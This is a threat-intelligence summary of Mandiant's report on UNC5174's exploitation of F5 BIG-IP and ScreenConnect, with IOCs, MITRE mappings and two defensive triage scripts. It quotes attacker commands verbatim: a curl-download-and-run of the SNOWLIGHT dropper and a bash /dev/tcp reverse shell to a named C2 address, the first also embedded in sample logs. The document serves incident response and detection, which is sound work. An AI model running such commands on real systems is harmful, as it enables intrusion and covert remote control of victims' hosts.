Keypoints
- UNC5174 exploited CVE-2023-46747 (F5 BIG-IP TMUI) and CVE-2024-1709 (ConnectWise ScreenConnect) to gain unauthenticated admin access and add accounts.
- Compromised F5 appliances show admin account creation, bash command execution via tmsh, and corresponding /etc/passwd and /etc/shadow entries.
- Actor downloaded and launched a Linux ELF downloader named SNOWLIGHT (/tmp/watchsys) which fetches and XOR-decodes secondary payloads in-memory using memfd/fexecve.
- SNOWLIGHT delivered GOHEAVY (Golang tunneler) and GOREVERSE reverse shell; GOHEAVY broadcasts “SpotUdp” and opens many local UDP ports for covert comms and lateral discovery.
- Internal reconnaissance used tooling fetched to /tmp/ss (likely FSCAN) to scan internal subnets; actors issued bash/netcat reverse shells to C2 addresses over TCP/443.
- IOC set includes specific C2 IPs, a SUPERSHELL C2 URL, multiple ELF MD5 hashes, filenames, and unauthorized user account names observed on victims.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Used to gain initial access by exploiting F5 BIG-IP and ScreenConnect vulnerabilities (‘Exploit Public-Facing Application’)
- [T1027] Obfuscated Files or Information – Actors used obfuscation and GOBFUSCATE on GOHEAVY and XOR encoding on payloads (‘Obfuscated Files or Information’)
- [T1070.004] File Deletion – Actors removed prior artifacts and deleted files like temporary binaries (‘File Deletion’)
- [T1140] Deobfuscate/Decode Files or Information – SNOWLIGHT XOR-decodes secondary ELF payloads with key 0x99 (‘XOR decoded using the key “0x99”’)
- [T1222.002] Linux and Mac File and Directory Permissions Modification – Actors changed permissions on downloaded tools (chmod 755 /tmp/watchsys) (‘Modify permissions of /tmp/watchsys’)
- [T1601.001] Patch System Image – Actor executed mitigation.sh to self-patch the appliance after compromise (‘ran command … /root/mitigation.sh -u’)
- [T1016] System Network Configuration Discovery – Internal scanning and network reconnaissance were performed from the appliance (‘scan internal subnet ranges’)
- [T1049] System Network Connections Discovery – Actor enumerated network connections and used tools to discover reachable hosts (‘System Network Connections Discovery’)
- [T1082] System Information Discovery – Commands and tooling gathered system information from compromised appliances (‘System Information Discovery’)
- [T1083] File and Directory Discovery – Actors listed directories and searched filesystem artifacts (ls -al /tmp/) (‘File and Directory Discovery’)
- [T1095] Non-Application Layer Protocol – Reverse shells and custom C2 over raw TCP/443 and UDP tunneling observed (‘Non-Application Layer Protocol’)
- [T1105] Ingress Tool Transfer – Tools (SNOWLIGHT, GOHEAVY, GOREVERSE, ss) were transferred to victim (/tmp/watchsys, /tmp/ss) (‘Download the file from a remote URL to /tmp/watchsys’)
- [T1572] Protocol Tunneling – GOHEAVY established tunneling behavior and protocol encapsulation for C2 and lateral comms (‘Protocol Tunneling’)
- [T1573.002] Asymmetric Cryptography – Mapped from the remediation guidance: cryptographic material and certificates on compromised appliances should be revoked and re-issued (‘Install Digital Certificate’ / certificate re-issue guidance)
- [T1059] Command and Scripting Interpreter – Actors executed shell commands via tmsh run util bash and used shell interpreters for payloads (‘run util bash -c “…”’)
- [T1059.004] Unix Shell – Specific use of Unix shell for reverse shells and command execution (bash -i /dev/tcp/… ) (‘bash -i /dev/tcp/172.104.124.74/443 0>&1 &’)
- [T1136.001] Local Account – Unauthorized local admin accounts were created (f5support3, F5_admin, f5_support) for persistence (‘create auth user f5support3’)
- [T1531] Account Access Removal – Actors deleted users and attempted account cleanup (deleted user root6) (‘deleted user root6’)
- [T1003.008] /etc/passwd and /etc/shadow – Creation and modification of OS credential stores observed (entries in /etc/passwd and /etc/shadow) (‘/etc/passwd’, ‘/etc/shadow’)
- [T1608.003] Install Digital Certificate – Indicators and remediation suggested revoking/reissuing certificates post-compromise (‘revoke and re-issue sensitive cryptographic material’)
Indicators of Compromise
- [IP Address] C2 and attacker hosts – 172.104.124.74 (observed as active C2 and used for payload hosting), 172.245.68.110 (SUPERSHELL C2), and other IPs (118.140.151.242, 61.239.68.73).
- [URL] SUPERSHELL C2 and payload hosting – http://172.245.68[.]110:8888 (SUPERSHELL C2), http://172.104.124[.]74/LG (SNOWLIGHT download URL).
- [Filename] Downloaded tooling and temporary files – /tmp/watchsys (SNOWLIGHT downloader), /tmp/ss (recon/scanner tool), and other temporary binaries used for execution.
- [User Account] Unauthorized admin accounts observed – local/f5support3 (created via TMUI and used to execute bash), cvetest (added to ScreenConnect instances).
- [File Hashes] ELF malware hashes – c867881c56698f938b4e8edafe76a09b (LG/SNOWLIGHT), 0951109dd1be0d84a33d52c135ba9c97 (SNOWLIGHT), and 4 other SNOWLIGHT-related MD5 hashes.
- [Commands / Artifacts] tmsh and REST audit entries – examples include “create auth user f5support3 … shell bash” and “run util bash -c ‘curl -o /tmp/watchsys http://172.104.124.74/LG;chmod 755 /tmp/watchsys;nohup /tmp/watchsys &;’”.
UNC5174 exploited F5 BIG-IP TMUI (CVE-2023-46747) using unauthenticated request smuggling to create administrative TMUI users and then invoked tmsh run util bash to execute shell commands; audit logs (/var/log/audit and /var/log/restjavad-audit.log) show creation of accounts (e.g., f5support3), corresponding /etc/passwd and /etc/shadow entries, and POSTs to /mgmt/tm/util/bash from attacker IPs. Once access was achieved, operators cleaned prior artifacts, downloaded a Linux ELF downloader to /tmp/watchsys via curl, set execute permissions and launched it (curl -o /tmp/watchsys http://172.104.124.74/LG; chmod 755 /tmp/watchsys; nohup /tmp/watchsys &).
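A triage script for the audit artifacts described above, added here as an example and not part of the Mandiant write-up. The log entries are constructed to mimic the shape of the tmsh audit log (/var/log/audit, cmd_data=...) and restjavad-audit.log; the exact field layout is an assumption, so adjust the patterns to the appliance's real format.

```python
import re
from typing import Dict, List

# Constructed sample entries (not real victim logs), shaped after the F5 tmsh
# audit log (/var/log/audit, "cmd_data=...") and restjavad-audit.log.
SAMPLE_LOGS = [
    "Nov  1 10:02:11 bigip1 notice tmsh[4711]: 01420002:5: AUDIT - pid=4711 user=admin "
    "folder=/Common module=(tmos)# status=[Command OK] cmd_data=list sys version;",
    "Nov  1 10:05:43 bigip1 notice tmsh[4820]: 01420002:5: AUDIT - pid=4820 user=admin "
    "folder=/Common module=(tmos)# status=[Command OK] cmd_data=create auth user f5support3 "
    "password ******** partition-access add { all-partitions { role admin } } shell bash;",
    "Nov  1 10:06:02 bigip1 notice tmsh[4902]: 01420002:5: AUDIT - pid=4902 user=f5support3 "
    "folder=/Common module=(tmos)# status=[Command OK] cmd_data=run util bash -c "
    '"curl -o /tmp/watchsys http://172.104.124.74/LG;chmod 755 /tmp/watchsys;nohup /tmp/watchsys &";',
    '[I][123][01 Nov 2023 10:06:02 UTC][ForwarderPassThroughWorker] {"user":"local/f5support3",'
    '"method":"POST","uri":"http://localhost:8100/mgmt/tm/util/bash","status":200}',
]

# Account creation through tmsh that grants the new user an interactive bash shell.
CREATE_USER_RE = re.compile(r"cmd_data=create auth user (\S+).*?\bshell bash\b", re.I)
# Shell execution through tmsh; group 1 is the command string handed to bash -c.
RUN_BASH_RE = re.compile(r'cmd_data=run util bash -c\s+"(.*)"', re.I)
# iControl REST equivalent: a POST to the util/bash endpoint.
REST_BASH_RE = re.compile(r'"user":"([^"]+)".*?"method":"POST".*?"uri":"[^"]*/mgmt/tm/util/bash"')
# Download inside the executed command; the URL stops at whitespace, ';' or a quote.
DOWNLOAD_RE = re.compile(r"\b(?:curl|wget)\b[^;]*?(https?://[^\s;\"']+)")

def triage(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per suspicious entry, carrying the artifact worth pivoting on."""
    findings = []
    for line in lines:
        m = CREATE_USER_RE.search(line)
        if m:
            findings.append({"rule": "tmsh_user_created_with_bash_shell", "user": m.group(1)})
            continue
        m = RUN_BASH_RE.search(line)
        if m:
            cmd = m.group(1)
            dl = DOWNLOAD_RE.search(cmd)
            findings.append({"rule": "tmsh_run_util_bash", "cmd": cmd, "url": dl.group(1) if dl else ""})
            continue
        m = REST_BASH_RE.search(line)
        if m:
            findings.append({"rule": "rest_post_util_bash", "user": m.group(1)})
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOGS):
        print(finding)
```

Each finding carries the pivot value (the created user, the executed command and its download URL, or the REST caller) so it can be matched against /etc/passwd, /tmp and the IOC list in the same pass.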
SNOWLIGHT (the downloader) connects to hard-coded C2 over TCP/443 using raw sockets, implements a binary protocol (one variant uses a fake HTTP header), XOR-decodes a secondary ELF with key 0x99, and loads that payload directly into memory using memfd_create and fexecve — leaving a memfd:a (deleted) process with no on-disk path. The in-memory payloads observed include GOHEAVY (Golang tunneler obfuscated with GOBFUSCATE) which opens many local UDP ports, broadcasts “SpotUdp” to network interfaces for peer discovery, and maintains concurrent comms to SUPERSHELL infrastructure; actors also deployed GOREVERSE and used bash/netcat reverse shells (bash -i /dev/tcp/172.104.124.74/443 0>&1 &) for C2 connectivity.
From compromised appliances the actor fetched additional reconnaissance tooling (saved as /tmp/ss and likely leveraging FSCAN) to scan internal CIDR ranges and pivot, executed commands to list and modify files/directories, and attempted to self-patch the vulnerable TMUI using F5’s mitigation.sh to deny subsequent opportunistic access. ScreenConnect (CVE-2024-1709) exploitation followed a similar pattern of adding admin accounts (e.g., cvetest) across many instances. Forensics should prioritize tmsh and REST audit logs, created local accounts, memfd process artifacts, download URLs/IPs (172.104.124.74, 172.245.68.110), and the SNOWLIGHT/GOHEAVY/GOREVERSE ELF hashes when investigating potential compromise.
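A live-response check for the memfd process artifacts that the two paragraphs above describe and prioritise, added here as an example and not code from Mandiant or F5. It walks /proc on a Linux host and flags processes whose executable image is an anonymous memfd file (the "/memfd:a (deleted)" shape left by memfd_create plus fexecve) or any other deleted binary; the decision logic is kept in a pure function so it can be exercised on constructed input.

```python
import os
import re
from dataclasses import dataclass
from typing import List, Optional

# /proc/<pid>/exe resolves to "/memfd:<name> (deleted)" when the running image was
# created with memfd_create() and executed via fexecve(); it never had an on-disk path.
MEMFD_RE = re.compile(r"^/memfd:(?P<name>.*) \(deleted\)$")

@dataclass
class Finding:
    pid: int
    comm: str
    exe: str
    severity: str  # "high" for memfd-backed images, "medium" for other deleted images

def classify(pid: int, comm: str, exe_target: Optional[str]) -> Optional[Finding]:
    """Pure decision logic; exe_target is the resolved /proc/<pid>/exe link or None."""
    if exe_target is None:  # kernel threads, or a process we lack permission to inspect
        return None
    if MEMFD_RE.match(exe_target):
        return Finding(pid, comm, exe_target, "high")
    if exe_target.endswith(" (deleted)"):  # binary unlinked after launch, e.g. a tmp dropper
        return Finding(pid, comm, exe_target, "medium")
    return None

def read_link(path: str) -> Optional[str]:
    try:
        return os.readlink(path)
    except OSError:  # ENOENT for kernel threads, EACCES without root, ESRCH if it exited
        return None

def read_comm(pid: int, proc_root: str) -> str:
    try:
        with open(f"{proc_root}/{pid}/comm") as fh:
            return fh.read().strip()
    except OSError:
        return "?"

def scan_proc(proc_root: str = "/proc") -> List[Finding]:
    """Scan every numeric /proc entry; returns findings sorted by pid (empty if /proc is absent)."""
    try:
        entries = os.listdir(proc_root)
    except OSError:
        return []
    findings = []
    for entry in entries:
        if not entry.isdigit():
            continue
        pid = int(entry)
        hit = classify(pid, read_comm(pid, proc_root), read_link(f"{proc_root}/{entry}/exe"))
        if hit:
            findings.append(hit)
    return sorted(findings, key=lambda f: f.pid)

if __name__ == "__main__":
    for f in scan_proc():
        print(f"[{f.severity}] pid={f.pid} comm={f.comm} exe={f.exe}")
```

A "high" hit should be preserved before the process is killed: copying /proc/<pid>/exe captures the in-memory ELF so it can be hashed against the SNOWLIGHT, GOHEAVY and GOREVERSE indicators.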
Read more: https://www.mandiant.com/resources/blog/initial-access-brokers-exploit-f5-screenconnect